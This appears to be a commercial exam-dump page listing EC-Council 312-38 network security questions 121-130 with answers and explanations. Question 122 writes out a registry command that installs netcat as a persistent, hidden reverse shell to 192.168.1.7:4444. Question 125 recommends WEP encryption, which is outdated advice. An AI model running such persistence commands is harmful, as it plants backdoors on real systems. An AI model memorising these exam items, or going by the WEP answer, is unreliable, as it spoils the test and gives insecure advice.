Latest Certified Success Dumps Download

CISCO, MICROSOFT, COMPTIA, HP, IBM, ORACLE, VMWARE
312-38 Latest Exam (Sep 2017)

[Free] 2017(Sep) EnsurePass Passguide ECCouncil 312-38 Dumps with VCE and PDF 121-130

September 20, 2017

EnsurePass
2017 Sep ECCouncil Official New Released 312-38
100% Free Download! 100% Pass Guaranteed!
http://www.EnsurePass.com/312-38.html

EC-Council Network Security Administrator (ENSA)

Question No: 121 – (Topic 2)

Which of the following is a standard-based protocol that provides the highest level of VPN security?

  1. L2TP

  2. IP

  3. PPP

  4. IPSec

Answer: D Explanation:

Internet Protocol Security (IPSec) is a standard-based protocol that provides the highest level of VPN security. IPSec can encrypt virtually everything above the networking layer. It is used for VPN connections that use the L2TP protocol. It secures both data and password. IPSec cannot be used with Point-to-Point Tunneling Protocol (PPTP).

Answer option B is incorrect. The Internet Protocol (IP) is a protocol used for communicating data across a packet-switched inter-network using the Internet Protocol Suite, also referred to as TCP/IP.IP is the primary protocol in the Internet Layer of the Internet Protocol Suite and has the task of delivering distinguished protocol datagrams (packets) from the source host to the destination host solely based on their addresses. For this purpose, the Internet Protocol defines addressing methods and structures for datagram encapsulation. The first major version of addressing structure, now referred to as Internet Protocol Version 4 (IPv4), is still the dominant protocol of the Internet, although the successor, Internet Protocol Version 6 (IPv6), is being deployed actively worldwide.

Answer option C is incorrect. Point-to-Point Protocol (PPP) is a remote access protocol commonly used to connect to the Internet. It supports compression and encryption and can be used to connect to a variety of networks. It can connect to a network running on the IPX, TCP/IP, or NetBEUI protocol. It supports multi-protocol and dynamic IP assignments. It is the default protocol for the Microsoft Dial-Up adapter.

Answer option A is incorrect. Layer 2 Tunneling Protocol (L2TP) is a more secure version of Point-to-Point Tunneling Protocol (PPTP). It provides tunneling, address assignment, and authentication. It allows the transfer of Point-to-Point Protocol (PPP) traffic between different networks.L2TP combines with IPSec to provide tunneling and security for Internet Protocol (IP), Internetwork Packet Exchange (IPX), and other protocol packets across IP networks.

Question No: 122 – (Topic 2)

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d quot;c:\windows\nc.exe -d 192.168.1.7 4444 -e

cmd.exequot;

What task do you want to perform by running this command?Each correct answer represents a complete solution. Choose all that apply.

  1. You want to perform banner grabbing.

  2. You want to put Netcat in the stealth mode.

  3. You want to add the Netcat command to the Windows registry.

  4. You want to set the Netcat to execute command any time.

Answer: B,C,D Explanation:

According to the question, you run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d quot;c:\windows\nc.exe -d 192.168.1.7 4444 -e

cmd.exequot;

By running this command, you want to perform the following tasks: Adding the NetCat command in the following registry value: HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Putting the Netcat in the stealth mode by using the -d switch. Setting the Netcat tool to execute command at any time by using the -e switch.

Answer option A is incorrect. You can perform banner grabbing by simply running the nc

lt;hostgt; lt;portgt;.

Question No: 123 – (Topic 2)

Which of the following UTP cables uses four pairs of twisted cable and provides transmission speeds of up to 16 Mbps?

  1. Category 5e

  2. Category 3

  3. Category 5

  4. Category 6

Answer: B Explanation:

Category 3 type of UTP cable uses four pairs of twisted cable and provides transmission speeds of up to 16 Mbps. They are commonly used in Ethernet networks that operate at the speed of 10 Mbps. A higher speed is also possible by these cables implementing the Fast Ethernet (100Base-T4) specifications. This cable is used mainly for telephone systems.

Answer option C is incorrect. This category of UTP cable is the most commonly used cable in present day networks. It consists of four twisted pairs and is used in those Ethernet networks that run at the speed of 100 Mbps. Category 5 cable can also provide a higher speed of up to 1000 Mbps.

Answer option A is incorrect. It is also known as Category 5 Enhanced cable. Its specification is the same as category 5, but it has some enhanced features and is used in Ethernets that run at the speed of 1000 Mbps.

Answer option D is incorrect. This category of UTP cable is designed to support high-speed networks that run at the speed of 1000 Mbps. It consists of four pairs of wire and uses all of them for data transmission. Category 6 provides more than twice the speed of Category 5e, but is also more expensive.

Question No: 124 – (Topic 2)

Which of the following protocols is used for inter-domain multicast routing and natively supports quot;source-specific multicastquot; (SSM)?

  1. BGMP

  2. DVMRP

  3. OSPF

  4. EIGRP

Answer: A Explanation:

BGMP stands for border gateway multicast protocol. It is used for inter-domain multicast routing and natively supports quot;source-specific multicastquot; (SSM). In order to support quot;any- source multicastquot; (ASM), BGMP builds shared trees for active multicast groups. This allows domains to build source-specific, inter-domain, distribution branches where needed. BGMP

uses TCP as its transport protocol, which helps in eliminating the need to implement message fragmentation, retransmission, acknowledgement, and sequencing.

Answer option B is incorrect. The Distance Vector Multicast Routing Protocol (DVMRP) is used to share information between routers to transport IP Multicast packets among networks. It uses a reverse path-flooding technique and is used as the basis for the Internet#39;s multicast backbone (MBONE). In particular, DVMRP is notorious for poor network scaling, resulting from reflooding, particularly with versions that do not implement pruning. DVMRP#39;s flat unicast routing mechanism also affects its capability to scale.

Answer option D is incorrect. EIGRP is a Cisco proprietary protocol. It is an enhanced version of IGRP. It has faster convergence due to use of triggered update and saving neighbor#39;s routing table locally. It supports VLSM and routing summarization. As EIGRP is a distance vector protocol, it automatically summarizes routes across Class A, B, and C networks. It also supports multicast and incremental updates and provides routing for three routed protocols, i.e., IP, IPX, and AppleTalk.

Answer option C is incorrect. Open Shortest Path First (OSPF) is a routing protocol that is used in large networks. Internet Engineering Task Force (IETF) designates OSPF as one of the Interior Gateway Protocols. A host uses OSPF to obtain a change in the routing table and to immediately multicast updated information to all the other hosts in the network.

Question No: 125 – (Topic 2)

You have just set up a wireless network for customers at a coffee shop. Which of the following are good security measures to implement? Each correct answer represents a complete solution. Choose two.

  1. Using WPA encryption

  2. Not broadcasting SSID

  3. Using WEP encryption

  4. MAC filtering the router

Answer: A,C Explanation:

With either encryption method (WEP or WPA), you can give the password to the customers who need it, and even change it frequently (daily if you like). So this won#39;t be an inconvenience for the customers.

Question No: 126 – (Topic 2)

Which of the following are the various methods that a device can use for logging information on a Cisco router? Each correct answer represents a complete solution. Choose all that apply.

  1. Buffered logging

  2. Syslog logging

  3. NTP logging

  4. Terminal logging

  5. Console logging

  6. SNMP logging

Answer: A,B,D,E,F Explanation:

There are different methods that a device can use for logging information on a Cisco router: Terminal logging: In this method, log messages are sent to the VTY session.

Console logging: In this method, log messages are sent directly to the console port. Buffered logging: In this method, log messages are kept in the RAM on the router. As the buffer fills, the older messages are overwritten by the newer messages.

Syslog logging: In this method, log messages are sent to an external syslog server where they are stored and sorted.

SNMP logging: In this method, log messages are sent to an SNMP server in the network. Answer option C is incorrect. This is an invalid option.

Question No: 127 – (Topic 2)

Which of the following is a software tool used in passive attacks for capturing network traffic?

  1. Sniffer

  2. Intrusion detection system

  3. Intrusion prevention system

  4. Warchalking

Answer: A Explanation:

A sniffer is a software tool that is used to capture any network traffic. Since a sniffer changes the NIC of the LAN card into promiscuous mode, the NIC begins to record incoming and outgoing data traffic across the network. A sniffer attack is a passive attack because the attacker does not directly connect with the target host. This attack is most often used to grab logins and passwords from network traffic. Tools such as Ethereal, Snort, Windump, EtherPeek, Dsniff are some good examples of sniffers. These tools provide many facilities to users such as graphical user interface, traffic statistics graph, multiple sessions tracking, etc.

Answer option C is incorrect. An intrusion prevention system (IPS) is a network security device that monitors network and/or system activities for malicious or unwanted behavior and can react, in real-time, to block or prevent those activities. When an attack is detected, it can drop the offending packets while still allowing all other traffic to pass.

Answer option B is incorrect. An IDS (Intrusion Detection System) is a device or software application that monitors network and/or system activities for malicious activities or policy violations and produces reports to a Management Station. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators.

Answer option D is incorrect. Warchalking is the drawing of symbols in public places to advertise an open Wi-Fi wireless network. Having found a Wi-Fi node, the warchalker draws a special symbol on a nearby object, such as a wall, the pavement, or a lamp post. The name warchalking is derived from the cracker terms war dialing and war driving.

Question No: 128 – (Topic 2)

John works as an Incident manager for TechWorld Inc. His task is to set up a wireless network for his organization. For this, he needs to decide the appropriate devices and policies required to set up the network. Which of the following phases of the incident handling process will help him accomplish the task?

  1. Containment

  2. Recovery

  3. Preparation

  4. Eradication

Answer: C Explanation:

Preparation is the first step in the incident handling process. It includes processes like backing up copies of all key data on a regular basis, monitoring and updating software on a regular basis, and creating and implementing a documented security policy. To apply this step a documented security policy is formulated that outlines the responses to various incidents, as a reliable set of instructions during the time of an incident. The following list contains items that the incident handler should maintain in the preparation phase i.e. before an incident occurs:

Establish applicable policies

Build relationships with key players Build response kit

Create incident checklists Establish communication plan Perform threat modeling

Build an incident response team Practice the demo incidents

Answer option A is incorrect. The Containment phase of the Incident handling process is responsible for supporting and building up the incident combating process. It ensures the stability of the system and also confirms that the incident does not get any worse. The Containment phase includes the process of preventing further contamination of the system or network, and preserving the evidence of the contamination.

Answer option D is incorrect. The Eradication phase of the Incident handling process involves the cleaning-up of the identified harmful incidents from the system. It includes the analyzing of the information that has been gathered for determining how the attack was committed. To prevent the incident from happening again, it is vital to recognize how it was conceded out so that a prevention technique is applied.

Answer option B is incorrect. Recovery is the fifth step of the incident handling process. In this phase, the Incident Handler places the system back into the working environment. In the recovery phase the Incident Handler also works with the questions to validate that the system recovery is successful. This involves testing the system to make sure that all the processes and functions are working normal. The Incident Handler also monitors the system to make sure that the systems are not compromised again. It looks for additional signs of attack.

Question No: 129 CORRECT TEXT – (Topic 2)

Fill in the blank with the appropriate term. A is a physical or logical subnetwork that adds an additional layer of security to an organization#39;s Local Area Network (LAN).

Answer: demilitarized zone

Question No: 130 CORRECT TEXT – (Topic 2)

Fill in the blank with the appropriate term. is a codename referring to investigations and studies of compromising emission (CE).

Answer: TEMPEST

100% Free Download!
Download Free Demo:312-38 Demo PDF
100% Pass Guaranteed!
Download 2017 EnsurePass 312-38 Full Exam PDF and VCE

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
PDF VCE Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

2017 EnsurePass IT Certification PDF and VCE